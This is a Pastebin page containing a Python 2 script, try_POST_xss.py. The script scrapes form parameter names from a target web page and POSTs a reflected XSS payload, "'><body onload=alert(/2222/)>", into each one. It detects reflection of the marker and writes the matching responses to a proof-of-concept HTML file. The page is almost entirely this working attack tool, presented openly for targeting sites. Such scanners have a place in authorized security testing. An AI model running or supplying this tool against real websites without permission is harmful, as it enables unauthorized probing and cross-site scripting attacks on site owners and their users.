Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- # try_POST_xss.py
- #
- # first we will GET argv[1]/page.argv[2] to read it
- # and find out what names/inputs/submits/etc... there are.
- # next we will POST those param-names separetly with 'payload'.
- # More @ http://hauntit.blogspot.com
- # enjoy.
- import urllib
- import urllib2
- import re
- import sys
- import httplib
- host = sys.argv[1]
- path_file = sys.argv[2]
- url = host+':80'
- url_file = url+path_file
- payload = '\'><body onload=alert(/2222/)>;]#/**'
- # if you want I have version 'payloads-from-file' too.
- print 'Target: ',host
- print 'Vuln file: ',path_file
- print 'Full URL to attack:' ,url_file
- print
- # first we must GET page, to read whole text to find
- # if there is any of our 'vulnerable' ('to find') string.
- get_connect = urllib.urlopen('http://'+url_file)
- get_response = get_connect.read()
- status = get_connect.getcode()
- print 'Status of requested page: ',status
- # what we're looking for:
- #results = re.findall("<(input|textarea|select).+?name=['\"].(.+?)['\"].*?>",get_response)
- results = re.findall(" name=\"([^\"]+)\"",get_response)
- #############################################################
- # hm ;] one idea to test right now. ;D
- poc = open('poc_file_for_POST_xss.html','w')
- #############################################################
- # func to send POST to target url+found parameter
- def do_post_now(url):
- params = urllib.urlencode ( { results[i] : payload } )
- headers = {'Content-type':'application/x-www-form-urlencoded','Accept':'text/plain'}
- connect = httplib.HTTPConnection(url)
- connect.request('POST', path_file, params, headers)
- response = connect.getresponse()
- print response.status, response.reason # 200 OK?
- data = response.read()
- connect.close() # end of test this parameter at this URL
- y=0
- line = data.find('2222')
- if line != -1:
- print '\t[+- ( POST XSS alert! ) -+]'
- print '\t [+] Found POST XSS in line:' ,line
- print data[y]
- print poc.writelines(data)
- # poc.close() # write&save simple p0c file. ;7
- # lookout here, because in some cases .close() method will generate an error.
- # that's why it's #commented here.
- y=y+1
- # end of do_post_now(url)
- # ---
- # MAIN:
- if len(sys.argv) < 2:
- sys.stderr.write('usage: '+sys.argv[0]+' localhost /path/2file.php')
- sys.exit(1)
- else:
- # if result found:
- if (len(results)>0):
- print '-------------------------------------------------------------'
- print 'Got some results :) Now we can try to exploit parameters.\n'
- i = 0 # next in list
- while i < len(results):
- print 'Found param called: ',results[i]
- print 'Do POST now, for URL: ', url, ' with param: ', results[i]
- # here we'll create a POST for found parameter
- do_post_now(url)
- # end of this POST for this parameter
- # and next line:
- i=i+1
- # end of while i loop
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement